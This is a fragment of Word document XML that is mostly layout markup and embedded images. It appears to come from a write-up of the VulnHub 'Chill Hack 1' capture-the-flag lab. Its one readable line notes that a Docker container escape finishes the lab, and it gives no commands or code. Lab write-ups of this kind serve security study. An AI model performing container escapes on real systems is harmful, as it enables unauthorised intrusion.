            <wp:docPr id="163668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49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17FC" w14:textId="4E27A88D" w:rsidR="00EB7EE5" w:rsidRDefault="00EB7EE5" w:rsidP="006007F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker逃逸就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D7E553" w14:textId="64A70A80" w:rsidR="00EB7EE5" w:rsidRDefault="00EB7EE5" w:rsidP="006007F3">
      <w:r w:rsidRPr="00EB7EE5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="774AB786" wp14:editId="18534574">
            <wp:extent cx="5274310" cy="697230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="275050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50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24A9" w14:textId="21B83985" w:rsidR="00EB7EE5" w:rsidRDefault="00EB7EE5" w:rsidP="006007F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB7EE5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33837AC2" wp14:editId="3AEDA88C">
            <wp:extent cx="5274310" cy="3071495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="507850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04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E52"/>
    <w:rsid w:val="00082532"/>
    <w:rsid w:val="000C412A"/>
    <w:rsid w:val="001B0764"/>
    <w:rsid w:val="002068C1"/>
    <w:rsid w:val="003626A7"/>
    <w:rsid w:val="006007F3"/>
    <w:rsid w:val="008D3286"/>
    <w:rsid w:val="00974E52"/>
    <w:rsid w:val="00A62E8F"/>
    <w:rsid w:val="00E27D2D"/>
    <w:rsid w:val="00EB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D245"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BFBDEC98-2E7F-4F99-8FD0-2E8806F3E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4E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E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E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4E5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4E5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4E5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4E5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4E5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4E5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4E5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74E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74E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4E5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4E5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74E5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4E5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4E5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4E5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4E5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4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4E5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4E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4E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4E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4E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4E5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4E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4E5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74E5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E27D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www.vulnhub.com/entry/chill-hack-1,622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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-17T07:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-19T08:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>